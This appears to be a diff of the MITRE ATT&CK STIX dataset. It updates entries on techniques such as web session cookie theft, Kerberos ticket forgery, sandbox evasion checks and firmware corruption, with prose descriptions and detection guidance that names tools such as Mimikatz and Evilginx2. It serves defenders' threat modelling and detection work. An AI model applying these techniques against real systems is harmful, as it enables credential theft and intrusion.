+ "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a \u201cHigh severity app permissions\u201d policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app\u2019s purpose, or apps with old \u201cLast authorized\u201d fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.",
+ "x_mitre_platforms": [
+ "SaaS",
+ "Office 365",
+ "Azure AD"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_contributors": [
"Shailesh Tiwary (Indian Army)",
"Mark Wee",
"Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
"Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "SaaS",
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a \u201cHigh severity app permissions\u201d policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app\u2019s purpose, or apps with old \u201cLast authorized\u201d fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access."
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "OAuth audit logs"
+ ]
},
{
"external_references": [
{
- "external_id": "T1539",
"source_name": "mitre-attack",
+ "external_id": "T1539",
"url": "https://attack.mitre.org/techniques/T1539"
},
{
@@ -25454,9 +26351,9 @@
"description": "Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019."
},
{
- "source_name": "Github evilginx2",
+ "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.",
"url": "https://github.com/kgretzky/evilginx2",
- "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019."
+ "source_name": "Github evilginx2"
},
{
"source_name": "GitHub Mauraena",
@@ -25469,7 +26366,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Steal Web Session Cookie",
- "description": "An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Mauraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.",
+ "description": "An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.",
"id": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -25478,28 +26375,29 @@
"phase_name": "credential-access"
}
],
- "modified": "2019-10-22T19:59:20.282Z",
+ "modified": "2020-04-21T15:26:25.584Z",
"created": "2019-10-08T20:04:35.508Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "API monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Johann Rehberger"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
"Office 365",
"SaaS"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Johann Rehberger"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "API monitoring"
- ],
- "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory."
+ ]
},
{
"external_references": [
@@ -25565,18 +26463,18 @@
],
"modified": "2020-03-31T12:59:11.121Z",
"created": "2020-02-11T19:12:46.830Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_system_requirements": [
+ "Kerberos authentication enabled"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
"x_mitre_data_sources": [
"Windows event logs",
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "Kerberos authentication enabled"
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -25602,7 +26500,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Steganography",
- "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was one of the first known and reported adversaries that used steganography with\u202fInvoke-PSImage. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ",
+ "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ",
"id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -25611,19 +26509,19 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:56:07.825Z",
+ "modified": "2020-06-08T18:16:48.253Z",
"created": "2020-02-05T14:28:16.719Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.",
+ "x_mitre_data_sources": [
+ "Binary file metadata"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_data_sources": [
- "Binary file metadata"
- ],
- "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
@@ -25654,20 +26552,20 @@
],
"modified": "2020-03-15T00:37:58.963Z",
"created": "2020-03-15T00:37:58.963Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92",
@@ -25728,27 +26626,27 @@
],
"modified": "2020-03-02T15:17:40.505Z",
"created": "2020-03-02T14:22:24.410Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "File monitoring",
- "Application logs"
- ],
- "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Application logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -25793,20 +26691,13 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-31T12:49:36.781Z",
+ "modified": "2020-06-20T22:42:26.314Z",
"created": "2020-02-05T14:54:07.588Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Anti-virus",
- "Autoruns Analysis",
- "Digital Certificate Validation",
- "Process whitelisting",
- "User Mode Signature Validation",
- "Windows User Account Control"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
"x_mitre_data_sources": [
"Binary file metadata",
"File monitoring",
@@ -25819,11 +26710,18 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
- ]
+ "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus",
+ "Autoruns Analysis",
+ "Digital Certificate Validation",
+ "Process whitelisting",
+ "User Mode Signature Validation",
+ "Windows User Account Control"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72",
@@ -25913,23 +26811,23 @@
],
"modified": "2020-03-27T01:03:26.306Z",
"created": "2020-01-30T14:34:44.992Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "root"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_effective_permissions": [
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"object_marking_refs": [
@@ -26005,21 +26903,21 @@
],
"modified": "2020-03-23T12:51:45.574Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Veeral Patel"
+ "x_mitre_version": "1.2",
+ "x_mitre_data_sources": [
+ "Web proxy",
+ "File monitoring"
],
+ "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
- "x_mitre_data_sources": [
- "Web proxy",
- "File monitoring"
+ "x_mitre_contributors": [
+ "Veeral Patel"
],
- "x_mitre_version": "1.2"
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -26050,11 +26948,9 @@
],
"modified": "2020-03-26T21:25:37.306Z",
"created": "2020-03-16T15:45:17.032Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Process monitoring",
@@ -26063,11 +26959,20 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
+ "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
+ "name": "System Checks",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -26085,21 +26990,18 @@
"source_name": "Unit 42 OilRig Sept 2018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "System Checks",
- "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
- "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
"type": "attack-pattern",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:20:15.370Z",
+ "modified": "2020-07-01T16:32:02.514Z",
"created": "2020-03-06T20:57:37.959Z",
"x_mitre_platforms": [
"Linux",
@@ -26254,37 +27156,48 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-23T23:50:48.027Z",
+ "modified": "2020-05-19T21:22:37.865Z",
"created": "2019-12-19T19:43:34.507Z",
- "x_mitre_defense_bypassed": [
- "Host intrusion prevention systems",
- "Anti-virus",
- "File monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Jean-Ian Boutin, ESET",
+ "McAfee",
+ "Ryan Becwar"
],
- "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
"x_mitre_data_sources": [
"EFI",
"BIOS",
"API monitoring"
],
- "x_mitre_contributors": [
- "McAfee",
- "Ryan Becwar"
+ "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_defense_bypassed": [
+ "Host intrusion prevention systems",
+ "Anti-virus",
+ "File monitoring"
]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:04.307Z",
+ "modified": "2020-03-26T18:17:42.298Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "System Information Discovery",
+ "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26312,19 +27225,9 @@
"source_name": "Microsoft Virutal Machine API"
}
],
- "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
- "name": "System Information Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T18:17:42.298Z",
- "created": "2017-05-31T21:31:04.307Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26379,21 +27282,21 @@
],
"modified": "2020-03-15T00:55:33.136Z",
"created": "2017-05-31T21:30:27.342Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
